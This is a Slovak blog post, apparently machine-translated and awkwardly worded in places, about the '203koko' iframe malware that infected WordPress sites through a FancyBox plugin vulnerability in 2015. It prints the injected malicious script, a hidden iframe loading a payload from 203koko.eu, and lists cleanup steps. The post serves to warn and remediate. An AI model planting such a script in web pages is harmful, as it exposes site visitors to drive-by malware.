Webová stránka [Malware iframe 203koko] WordPress Infikovaný malvér

Skôr tento týždeň rad internetových stránok a blogov WordPress, dostal varovania od infekcie malware skrz Google webmasterov.

Problém, ku ktorému Google webmasterov uvedené je prítomnosť treska / scenár škodlivý softvér iframe zdrojovej webovej stránky.

<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>

Zdá sa, že sa jedná o zraniteľnosť a zapojiťacquis FancyBox pre WordPress ktorý až do včerajška (05.02.2015) neboli aktualizované na dlhú dobu.
Riešenie tohto problému a dezinfekčné vírusy weby s týmto malware, je pomerne jednoduché.
1. Zakážte doplnok FancyBox.
2. Odstráňte všetky súbory doplnkov FancyBox zo servera (cez FTP)
3. Nainštalujte novú verziu doplnku (Fancybox 3.0.4)

FancyBox pre WordPress 3.0.4

- Premenované nastavenie ovplyvnené bezpečnostným problémom uvedeným v 3.0.3. To by malo zastaviť zobrazovanie škodlivého kódu na stránkach, kde sa plugin nachádza updated bez odstránenia škodlivého kódu.

FancyBox pre WordPress 3.0.3

Opravený problém so zabezpečením.

Informácie o škodlivom softvéri: 

TYP: Iframe presmerovanie
TARGET: WordPress fancybox
Škodlivého softvéru DOMAIN: 203koko.eu
Malware URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW KÓD:
PÍSOMNÝ PORUCHA: if (navigator.userAgent.match(/msie/i)) { document.write(‘

Odstráňte malvér zo svojho WordPress webové stránky.

Zakladateľ a editor Stealth Settings, od roku 2006 do súčasnosti. Skúsenosti s operačnými systémami Linux (najmä CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CMS).

Pridať komentár